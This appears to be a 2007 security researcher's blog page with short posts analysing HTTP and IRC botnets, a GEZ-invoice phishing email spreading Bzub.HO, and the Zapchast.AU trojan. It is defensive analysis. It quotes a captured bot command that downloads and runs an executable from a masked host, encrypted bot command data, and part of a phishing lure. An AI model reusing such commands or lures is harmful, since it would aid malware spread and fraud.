Virus Blog

Tracking HTTP Bots

— Posted by zeroq @ 10:29 - 22 Feb, 2007

We are currently monitoring a number of infected machines, which receive their remote commands via the HTTP protocol. Our bot detection tool Rishi is able to detect so called HTTP bots, which in contrast to IRC bots use websites to distribute commands. An infected machine frequently contacts a special webserver to retrieve a file called "text.dat", which contains further instructions to perform. However, these files seem to be encrypted, so we do not yet know what the bots are supposed to do. Following is an extract of one of those files:

eoeve-115jj,2$+16 $7&-k+ 1j,("j&(!k5-5HOHOeoewupete-115jj)k( ??,&*! &k+ 1j$qtwj! k5-5z'x'7$+!▒HOeoewttete-115jj)k( ??,&*! &k+ 1j$qtwj=5k5-5z'x'7$+!▒HOeoewtqete-115jj)k( ??,&*! &k+ 1j$qtwj$+tk5-5z'x'7$+!▒HOeoewtpete-115jj)k( ??,&*! &k+ 1j$qtwj55k5-5z'x'7$+!▒HOeoewtsete-115jj)k( ??,&*! &k+ 1j$qtwj7(k5-5z(x(*! (▒c'x'7$+!▒HOeoewtrete-115jj)k( ??,&*! &k+ 1j$qtwj63k5-5z(x(*! (▒c'x'7$+!▒HOeoewt}ete-115jj)k( ??,&*! &k+ 1j$qtwj17k5-5z(x(*! (▒c'x'7$+!▒HOeoewwtete-115jj)k( ??,&*! &k+ 1j$qtwj(&k5-5z(x(*! (▒c'x'7$+!▒HOeoewwwete-115jj)k( ??,&*! &k+ 1j$qtwj


Decrypting Bzub.HO URLs

— Posted by zeroq @ 10:55 - 09 Feb, 2007
Recently, i came across an email which distributed the trojan Bzub.HO.
The mail looks something like this:

*******************************************
GEZ Rechnung

Ihre detaillierte GEZ Rechnung von ..... - .....

Rechnungsnummer ...
Kundennummer ....
Datum ....
Bei Rueckfragen bitte Kundennummer angeben

Sehr geehrter GEZ Kunde,
 (More)

Trojan Zapchast.AU

— Posted by zeroq @ 18:38 - 06 Feb, 2007

I have written a short analysis of the trojan Zapchast.AU, which can be downloaded here.

"The trojan Zapchast.AU is distributed by email, but not as
a file attachment. The mail contains a message about a
greeting card which is waiting for the recipient to be downloaded.
Embedded in the message is a hyper link leading
to a suspicious file named postcard.gif.exe. As Microsoft
Windows file manager by default hides known extensions
like .exe the file appears on the hard disk as
postcard.gif..."



BDS/SpamBot.Gen

— Posted by zeroq @ 10:07 - 05 Feb, 2007

Thanx to our Bot-Detection software called Rishi we managed to get our hands on some new binaries of the BDS/SpamBot.Gen. This particular bot utilizes an IRC based command and control server, but does not connect to any channel to receive its commands. Instructions are transmitted via private messages like this:

PRIVMSG jejb-1_9910_1528 :exec http://xxx.xxx.xxx.xxx/up/hdda.2.exe?jejb-1_9910_1528 hdda.2.exe 777

 (More)

First Entry

— Posted by zeroq @ 12:26 - 04 Feb, 2007
This is my first post in my new virus blog. I will be blogging about all kinds of stuff which is related to IT security. This includes Honeypot deployment and maintenance, as well as, behaviour anlysis of trojans and viruses.

Powered by kulando